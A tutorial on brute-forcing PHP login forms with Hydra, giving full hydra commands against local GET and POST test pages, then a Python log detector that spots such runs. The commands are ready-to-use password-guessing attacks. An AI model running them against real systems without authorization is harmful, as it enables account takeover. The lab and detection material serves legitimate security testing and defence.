Brute-force and dictionary attacks try to find a user name or password by making repeated login attempts against a system. In this article, we will see how a page with a user name and password form can be attacked using hydra and patator. The sample pages used as targets in this study are written in PHP.

A dictionary attack draws its guesses from a pool of words. A brute-force attack, unlike a dictionary attack, tries every possible input of a defined length and character set. If you want to break a password or other data, it is recommended to run a dictionary attack first and then a brute-force attack.

In this article, both the 'POST' and the 'GET' method will be tested, breaking the user name and password fields together. Since the testing machine and the site are on the same machine, 127.0.0.1 will be used as the IP address. For other sites, this value must be replaced by the corresponding IP address or domain name.
The contents of the HTML (PHP) page we use are linked below.

File Name: post_test.php

File Name: get_test.php

Tests will be done with Hydra on Kali Linux. Hydra can attack logins over a variety of different protocols, but this article only covers testing the strength of a password behind an HTTP form.

This guide uses both word lists and the brute-force parameter to supply Hydra with the inputs to be tested.

Let us try to find the password by running it separately for both GET and POST pages.
The following are descriptions of the Hydra parameters to be used.

-l LOGIN Takes a single user name (example usage: -l admin)
-L FILE Tries each word in a list as the user name (example usage: -L example.txt)
-p PASS Takes a single password (example usage: -p pass)
-P FILE Tries each word in a list as the password (example usage: -P example.txt)
-v or -V Verbose mode / the login + password is shown for each attempt.

-x min:max:charset
Generates passwords from the minimum to the maximum length. In the character set, 1 stands for numbers, a for lowercase and A for uppercase characters. Any other character given is added to the set as-is.
(Example Usage: -x 1:5:a1.)
Here the password length is between 1 and 5 characters, and the character set is lowercase letters, numbers and '.'.

-e nsr
Used for additional checks: 'n' tries a null (empty) password, 's' tries the user name as the password, and 'r' tries the reversed user name as the password.

http[s]-{get|post}-form '1:2:3:4'
http- for HTTP and https- for HTTPS site tests.
http[s]-post-form for POST forms.
http[s]-get-form for GET forms.

'1:2:3:4'
1 is the page, 2 is the body content, 3 is the failure (F=) or success (S=) message, and 4 is for headers (H=), such as a cookie, which can be specified optionally.
(Example Usage: /get_test.php:username=^USER^&password=^PASS^&Login=Login:F=Login failed)
When specifying the page value, do not forget the leading /.
The username, password, and Login fields are the names of the form elements. Change these values for forms with different element names.

Warning: Hydra is a tool used to attack. Use only on your own systems and networks, unless you have written permission from the owner. Otherwise, its use is illegal.

Hydra usage examples for get_test.php:

hydra -L '/usr/share/wordlists/wfuzz/general/common.txt' -P '/usr/share/wordlists/wfuzz/general/common.txt' -v -V 127.0.0.1 http-get-form '/get_test.php:username=^USER^&password=^PASS^&Login=Login:F=Login failed' 

hydra -l admin -P /usr/share/wordlists/wfuzz/general/common.txt -v -V 127.0.0.1 http-get-form '/get_test.php:username=^USER^&password=^PASS^&Login=Login:F=Login failed' 

hydra -l admin -P '/usr/share/wordlists/wfuzz/general/common.txt' -v -V -e nsr 127.0.0.1 http-get-form '/get_test.php:username=^USER^&password=^PASS^&Login=Login:F=Login failed' 

hydra -l admin -P '/usr/share/wordlists/wfuzz/general/common.txt' -v -V 127.0.0.1 http-get-form '/get_test.php:username=^USER^&password=^PASS^&Login=Login:S=Login successful' 

hydra -l admin -x 5:5:a -v -V 127.0.0.1 http-get-form '/get_test.php:username=^USER^&password=^PASS^&Login=Login:F=Login failed'

Hydra usage examples for post_test.php:

hydra -L '/usr/share/wordlists/wfuzz/general/common.txt' -P '/usr/share/wordlists/wfuzz/general/common.txt' -v -V 127.0.0.1 http-post-form '/post_test.php:username=^USER^&password=^PASS^&Login=Login:F=Login failed' 

hydra -l admin -P '/usr/share/wordlists/wfuzz/general/common.txt' -v -V 127.0.0.1 http-post-form '/post_test.php:username=^USER^&password=^PASS^&Login=Login:F=Login failed'

hydra -l admin -x 1:5:a1 -v -V 127.0.0.1 http-post-form '/post_test.php:username=^USER^&password=^PASS^&Login=Login:F=Login failed'
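
Seen from the server side, runs like the ones above leave a clear trace: one client sending many requests to the login page in a short time and, for the GET form, every guessed password written into the access log as part of the URL. The following detector is an added example, not part of the original article; it assumes an Apache/nginx combined-style access log, and the window, threshold and sample log lines are constructed for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from urllib.parse import urlsplit, parse_qs

LOGIN_PATHS = {"/get_test.php", "/post_test.php"}  # the article's two test pages
WINDOW = timedelta(seconds=60)  # assumption: sliding window per client
THRESHOLD = 10                  # assumption: max login requests per window

# Combined-log prefix: ip, ident, user, [timestamp], "METHOD target proto", status
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([A-Z]+) (\S+) [^"]*" (\d{3}) ')

def parse(line):
    """Return (ip, time, username, password_in_url) for login requests, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, ts, _method, target, _status = m.groups()
    url = urlsplit(target)
    if url.path not in LOGIN_PATHS:
        return None
    query = parse_qs(url.query, keep_blank_values=True)
    when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
    return ip, when, query.get("username", [None])[0], "password" in query

def detect(lines):
    """Map each client over THRESHOLD to its peak rate, usernames and URL leaks."""
    recent, alerts = defaultdict(deque), {}
    seen = defaultdict(lambda: {"peak": 0, "usernames": set(), "password_in_url": False})
    for ip, when, user, leaked in filter(None, map(parse, lines)):
        hits, info = recent[ip], seen[ip]
        hits.append(when)
        while when - hits[0] > WINDOW:  # drop requests older than the window
            hits.popleft()
        if user:
            info["usernames"].add(user)
        info["password_in_url"] |= leaked  # GET form: passwords end up in the log
        info["peak"] = max(info["peak"], len(hits))
        if len(hits) > THRESHOLD:
            alerts[ip] = info
    return alerts

def sample_log():
    """Constructed sample: 30 GET guesses in 15 s, plus one ordinary client."""
    guesses = [f'127.0.0.1 - - [10/Mar/2024:10:00:{i // 2:02d} +0000] "GET /get_test.php'
               f'?username=admin&password=guess{i}&Login=Login HTTP/1.0" 200 512'
               for i in range(30)]
    normal = ['192.0.2.7 - - [10/Mar/2024:10:00:05 +0000] "POST /post_test.php HTTP/1.1" 200 498',
              '192.0.2.7 - - [10/Mar/2024:10:05:00 +0000] "GET /index.php HTTP/1.1" 200 1024']
    return guesses + normal
```

Calling detect(sample_log()) flags only 127.0.0.1. The POST form leaves no user name or password in the log, so for post_test.php the request rate is the only signal this detector has.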